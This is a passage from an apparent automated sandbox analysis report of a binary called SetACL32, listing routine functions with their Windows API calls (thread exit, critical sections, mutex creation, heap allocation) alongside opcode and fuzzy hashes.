                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CreateErrorLastThread__dosmaperr
                • String ID: @M)w
                • API String ID: 2744730728-1211491014
                • Opcode ID: b1de57d5a23b9a5abaea5e82eec6317b80c7dd01d10a1149ae0344e6c0006e68
                • Instruction ID: 239bc8c818d2e412c9b77246d89fc5dfd36c789516da15b687873d9740a6e135
                • Opcode Fuzzy Hash: b1de57d5a23b9a5abaea5e82eec6317b80c7dd01d10a1149ae0344e6c0006e68
                • Instruction Fuzzy Hash: E1019E72900219AFEF15AFB0DC15EAE7BA5FF24324F000068F80196190DB74EE41FB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9413E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(00FC7070,0000000C), ref: 00F94151
                • ExitThread.KERNEL32 ref: 00F94158
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorExitLastThread
                • String ID: @M)w
                • API String ID: 1611280651-1211491014
                • Opcode ID: 0431e9cffae592d81a4d6869ebb95e62819f089f5a0383f19ded26d20bc6c2fd
                • Instruction ID: 94d054f21ff2fb845cd82641ecb200800fb763aaed80fe33cc1b16fc0ed49c0d
                • Opcode Fuzzy Hash: 0431e9cffae592d81a4d6869ebb95e62819f089f5a0383f19ded26d20bc6c2fd
                • Instruction Fuzzy Hash: 1AF08C71A40308AFEF05ABB0CC0AE6E7B64EF51710F100149F01197262CB39A981FB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F51430 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F69500: EnterCriticalSection.KERNEL32 ref: 00F69535
                  • Part of subcall function 00F69500: RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 00F696A6
                • EnterCriticalSection.KERNEL32(00FCB6D4), ref: 00F51486
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F5149D
                • EnterCriticalSection.KERNEL32(00FCB6D4), ref: 00F514A4
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F514B5
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$Enter$Leave$EventRegisterSource
                • String ID:
                • API String ID: 2153909985-0
                • Opcode ID: cadcd559e9ffdc1701c3718933e6579469c74cf2a10d30c44739ad22f97e3622
                • Instruction ID: 2e38aa95f8d2cc57440060da32d5e6325b1c0d6786e87708cf830d065a9ee39d
                • Opcode Fuzzy Hash: cadcd559e9ffdc1701c3718933e6579469c74cf2a10d30c44739ad22f97e3622
                • Instruction Fuzzy Hash: FA01A2B194420DAFCB10EF61DD47F9A7BA4EB05B10F000168B41857291D7B49804EF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F514C5 Relevance: 4.6, APIs: 3, Instructions: 70synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(00003A98), ref: 00F51557
                • CloseHandle.KERNEL32(00000000), ref: 00F5156E
                • DeregisterEventSource.ADVAPI32(00000000), ref: 00F51588
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CloseDeregisterEventHandleObjectSingleSourceWait
                • String ID:
                • API String ID: 1676057058-0
                • Opcode ID: 0f9dee7f4618ef8a48cd52341947c99f92785571a7de1853d1a5bf9221a1b63d
                • Instruction ID: 154a06a2c03b57fea9a87e2f3a8d7189572f0239c6a52fae6d3e4e7266799dad
                • Opcode Fuzzy Hash: 0f9dee7f4618ef8a48cd52341947c99f92785571a7de1853d1a5bf9221a1b63d
                • Instruction Fuzzy Hash: E421F534A4420E9FDB04DF60DE0BF9A77A5FB94311F1400A9E90A97290DBB89A04FB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F941F3 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97377: GetLastError.KERNEL32(?,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9737C
                  • Part of subcall function 00F97377: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F9741A
                • CloseHandle.KERNEL32(?,?,?,00F9432A,?,?,00F9419C,00000000), ref: 00F94224
                • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00F9432A,?,?,00F9419C,00000000), ref: 00F9423A
                • ExitThread.KERNEL32 ref: 00F94243
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                • String ID:
                • API String ID: 1991824761-0
                • Opcode ID: b04fe3c8336ddc6418c90b0bbe54f22ce1ec2f241b56f230f71aaa5245e58d02
                • Instruction ID: 7d9bd8db4ad181a8c08bd3f1785d09a4b3bb22e93c31bb2230f2d5a72a6fa604
                • Opcode Fuzzy Hash: b04fe3c8336ddc6418c90b0bbe54f22ce1ec2f241b56f230f71aaa5245e58d02
                • Instruction Fuzzy Hash: 65F058309006156BEF211B759C08E6A3A98BFA6374B084650F829C71A0DB34FC82EA91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F512C0 Relevance: 4.5, APIs: 3, Instructions: 29synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(00000000,00000000,00000000), ref: 00F512C6
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F512D9
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F512EC
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Create$Event$Mutex
                • String ID:
                • API String ID: 646228171-0
                • Opcode ID: f32549e10399d7a6a0b9f66e23de3d9da81295345f229d9a8e86e5855c434b2c
                • Instruction ID: 97d2588edd5ddf1a2baee28900651aa70f8976f5c135373d82e4e7e09d5ee180
                • Opcode Fuzzy Hash: f32549e10399d7a6a0b9f66e23de3d9da81295345f229d9a8e86e5855c434b2c
                • Instruction Fuzzy Hash: 39F0A4B2688318EAF7149F65AE1FF423AA0FB05B05F245109F2069F9E0D7FA1044EB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F515D0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F516BF
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: -log
                • API String ID: 1620887387-56760616
                • Opcode ID: 88038badd82d5cda2bb345bde79cbe73995336ba10471da73a7744e6f6eb99d4
                • Instruction ID: 0eca999874004d58106c14e343a6c7822a87d27cbe9b5fbcc1faee8dcebe6396
                • Opcode Fuzzy Hash: 88038badd82d5cda2bb345bde79cbe73995336ba10471da73a7744e6f6eb99d4
                • Instruction Fuzzy Hash: 46512431E002089FCB14DFA8DC85BEEBBB6FF89315F184218E905A7341DB35AA49DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8CD74 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,00FC9AA4,00000007,00F8A0BD,?,00FC6D6C,+qmt), ref: 00F8CDD4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DispatcherExceptionUser
                • String ID: +qmt
                • API String ID: 6842923-2222937483
                • Opcode ID: fa5df16410ffc71d35b4470e539cd02fb79cc5f961763d3a7a2622b090cbd42f
                • Instruction ID: 3b6ee4fe67af349ab03d4077fba19d71ff3356b77868eff92c1332a55461136c
                • Opcode Fuzzy Hash: fa5df16410ffc71d35b4470e539cd02fb79cc5f961763d3a7a2622b090cbd42f
                • Instruction Fuzzy Hash: DD018F76900208ABDB01AF58D884BEEBFB8EF45710F15406AED15AB391D770AD01DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9AF11 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00F9AF5D
                • GetFileType.KERNELBASE(00000000), ref: 00F9AF6F
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID:
                • API String ID: 3000768030-0
                • Opcode ID: 02caa8dd710bdf0b130c35f2b4a54b2d617bfc5a0db60e183004694bf5b5e76e
                • Instruction ID: e31ff0b53dadc8da22671537a24e28331d2fce558559b73b8585a3e1e6bc5797
                • Opcode Fuzzy Hash: 02caa8dd710bdf0b130c35f2b4a54b2d617bfc5a0db60e183004694bf5b5e76e
                • Instruction Fuzzy Hash: B711B7F26047514AEF304A3E8C88622BA949B5237CB340719D1BAC75F1C734D985F2C2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8A8B1 Relevance: 3.0, APIs: 2, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlEncodePointer.NTDLL(00000000,?,00F89F70,00F89FB6,?,00F89DFD,00000000,00000000,00000000,00000004,00F5AF47,00000001,746D712B,00000000,?,?), ref: 00F8A8C4
                • IsProcessorFeaturePresent.KERNEL32(00000017,00F972DC,?,?,00F94163,00FC7070,0000000C), ref: 00F9578E
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: EncodeFeaturePointerPresentProcessor
                • String ID:
                • API String ID: 4030241255-0
                • Opcode ID: 9af64a6e13e40f9f43990f0f8211884d648d2f83f8800188869557fe7bae2d89
                • Instruction ID: 59f9076576ccdfca312b03eb0f1d4bb302577bdca49bf7efd4d1392da49bb297
                • Opcode Fuzzy Hash: 9af64a6e13e40f9f43990f0f8211884d648d2f83f8800188869557fe7bae2d89
                • Instruction Fuzzy Hash: 3501B570988B0DEBFF167BB0BD0FF593754AB01B24F044058B9085A1E1DFB54A45B752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A656 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                Download Yara Rule
                APIs
                • CompareStringEx.KERNELBASE(?,00FA30AF,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7FFFFFFF,?,00F9C1BB,?,00001001), ref: 00F9A68A
                • CompareStringW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00FA30AF,-00000002,00000000,00000000,00000000,00000000), ref: 00F9A6A8
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CompareString
                • String ID:
                • API String ID: 1825529933-0
                • Opcode ID: 987e0b55f1d90b2599cba4ee5ea5c55e697115f0421cdcd4224190d51c37d8da
                • Instruction ID: 328799204ff1d740f3dedbe4f7925a686ea3978c88f0831879012f9483e6ae43
                • Opcode Fuzzy Hash: 987e0b55f1d90b2599cba4ee5ea5c55e697115f0421cdcd4224190d51c37d8da
                • Instruction Fuzzy Hash: C9F0683240021EBBDF125F90DC05DDE3F26AB487A0F098110BA1865020DB36C872BB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9BD35 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: __cftof
                • String ID:
                • API String ID: 1622813385-0
                • Opcode ID: 70def35c964035302382885534a14ae05f577b4664d8f1f4205b7d5794052241
                • Instruction ID: eb5aa94457c688675315d2fba1eabf2559af52a4f93abe696ef720411f4457f8
                • Opcode Fuzzy Hash: 70def35c964035302382885534a14ae05f577b4664d8f1f4205b7d5794052241
                • Instruction Fuzzy Hash: 8231F9329081146ABF197B38BF979FE776C9E81B30724021AF5249B0D1EF29D843B691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F96A15 Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 5d08be2e05f4f25d03334fb65fe34752b917b9f2c2366c254b6755617d5efa31
                • Instruction ID: 483f2bb13eb04ba84ad32cc1ea7f77576fe6483471b1686daad53a13af118ccb
                • Opcode Fuzzy Hash: 5d08be2e05f4f25d03334fb65fe34752b917b9f2c2366c254b6755617d5efa31
                • Instruction Fuzzy Hash: 7E317876E006149F9F14DF69C48489EB7F2FF89320726C2A5E519EB360C334AD46EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A553 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 711f5d0d4f5d38ca6b581ff6606460c81c0f7008b434a8c049a208cd9f4bbc44
                • Instruction ID: ee66758e5d68541af3d356345938592d000b7e58e7eab5ca39489a8b8e947998
                • Opcode Fuzzy Hash: 711f5d0d4f5d38ca6b581ff6606460c81c0f7008b434a8c049a208cd9f4bbc44
                • Instruction Fuzzy Hash: EF01F133B402199BAF268E6DEC41A9A339ABBC033072A8160FD05CB194DA30DD05B7D2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9FE92 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                • _free.LIBCMT ref: 00F9FF01
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: cabf28225fd3a41a915252ae96e33d440cfae9ab80b93131df364b805196d117
                • Instruction ID: 96eea92b02cec4c6e0569cfe1b9240522f307bc345e788c7b0ecda6df69a0c73
                • Opcode Fuzzy Hash: cabf28225fd3a41a915252ae96e33d440cfae9ab80b93131df364b805196d117
                • Instruction Fuzzy Hash: F4012273A043166BEB309F68C88199AFB98EB053B0F140629E445E76C0EB706C15CBE4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8F570 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                • _free.LIBCMT ref: 00F8F590
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLast_free
                • String ID:
                • API String ID: 314386986-0
                • Opcode ID: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
                • Instruction ID: a0506e706c7722cdda68d9dd1ff9dbb6fcabd4d69ee983b95c4773311d0e5061
                • Opcode Fuzzy Hash: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
                • Instruction Fuzzy Hash: BA01C8B6E00219AFDB10EFA9C841ADEBBB8FB48710F144166E914E7240E774AA55CBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97FB2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F973C2,00000001,00000364,00000006,000000FF,?,?,00F93E45,00F98035,?,?,00F96ACD), ref: 00F97FF3
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 8a0d58358157342aa9e6c92fe9e67630a748c51181e7cf1a325879d43f840824
                • Instruction ID: dec8cbb80d4adab5fb6bb396b59d5471d1f5efa810359709ba2e2d4be48bbc4e
                • Opcode Fuzzy Hash: 8a0d58358157342aa9e6c92fe9e67630a748c51181e7cf1a325879d43f840824
                • Instruction Fuzzy Hash: 57F0B43291C725A6BF227A62DC06F6B3788AF81774B158061A815B6190DE30DC01B6E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA342D Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • _free.LIBCMT ref: 00FA344D
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLast_free
                • String ID:
                • API String ID: 314386986-0
                • Opcode ID: f92ee1901cd8096dbcb0af971099cca00dbb490c8258481c23d05de6a0fa212b
                • Instruction ID: ff3983cf809be9549902596baa5cfbfc17f1c3961db4d40ef0db409f635329b0
                • Opcode Fuzzy Hash: f92ee1901cd8096dbcb0af971099cca00dbb490c8258481c23d05de6a0fa212b
                • Instruction Fuzzy Hash: EBF0CD731043048FE3218F45D802B92F3F8EF81B21F10842FE29A8B5A0DBB8B4459B84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F98049 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 02247c3b0012637392768e30c2a20f12c8828e1bef9034e0d894a7cb6a045044
                • Instruction ID: 31f6ccd558f0e727e38171770a6c05dd943245c17b416bd9d3fa0e10174d3329
                • Opcode Fuzzy Hash: 02247c3b0012637392768e30c2a20f12c8828e1bef9034e0d894a7cb6a045044
                • Instruction Fuzzy Hash: 95E06D3290166597FE3176669C05B6B7A489F437F0F190221AD46971A0CF66CC4AB2E1
                Uniqueness

                Uniqueness Score: -1.00%

